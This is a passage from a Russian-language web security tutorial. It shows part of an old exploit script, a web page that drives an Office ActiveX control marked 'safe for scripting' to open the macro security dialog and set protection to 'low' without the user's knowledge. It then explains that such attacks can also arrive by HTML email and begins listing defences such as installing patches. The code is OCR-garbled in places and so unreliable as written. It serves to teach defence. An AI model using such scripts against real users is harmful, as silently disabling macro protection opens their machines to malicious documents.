Иллюстрированный самоучитель по Secure Web
Проверка того, что объекты UA
// Создание элемента UA
ua = new ActiveXObject("OUACtrl.OUACtrl.1");
// Присоединение объекта ua к объекту ppt ua.WndClass=
"OpusApp"; ua.OfficeApp=0;
// Проверка того, что объекты UA "видят"
приложение Office return ua.IsAppRunning();
)
function disablemacroprotection()
{
var ret;
// Активизация приложения ua.AppActivate();
// Отображение диалогового окна защиты макросов
ua.ShowDialog(ОхОЕ2В);
// Щелчок на кнопке 'low' ua.SelectTabSDM(Ox!3);
// Щелчок на кнопке 'ok' ua.SelectTabSDM(l);
}
function enablemacroprotection()
{
// Активизация приложения
ua.AppActivate ();
// Отображение диалогового окна защиты макросов
ua.ShowDialog(OxOE2B);
// Щелчок на кнопке 'medium' ua.SelectTabSDM(0x12);
// Щелчок на кнопке 'ok'
ua.SelectTabSDM(1); }
// Начало выполнения сценария if(setupO)
{
disablemacroprotection();
parent.frames["blank"].location—
}
</script>
</body>
</html>
Элементы управления, помеченные как "safe for scripting", могут вызываться также из электронных сообщений в формате HTML. В этом случае их гораздо легче разместить в нужном месте, поэтому они могут быть более опасны. Подобные "бомбы" обсуждаются в следующих разделах, посвященных хакингу через электронную почту.
Защита от использования флага "safe for scripting"
Для защиты от этих серьезных изъянов пользователям Internet можно предложить три метода. Мы рекомендуем воспользоваться всеми тремя способами.
Во-первых, установите все имеющиеся модули обновления. Однако не забывайте о том, что это лишь локальное решение проблемы: при использовании этих модулей обновления флаг "safe for scripting" будет изменен только для конкретных элементов управления. Они не обеспечивают глобальной защиты против любых атак, основанных на применении других элементов управления, помеченных как безопасные. Мы еще не до конца обсудили "случайного троянского коня" и вернемся к нему немного позже.
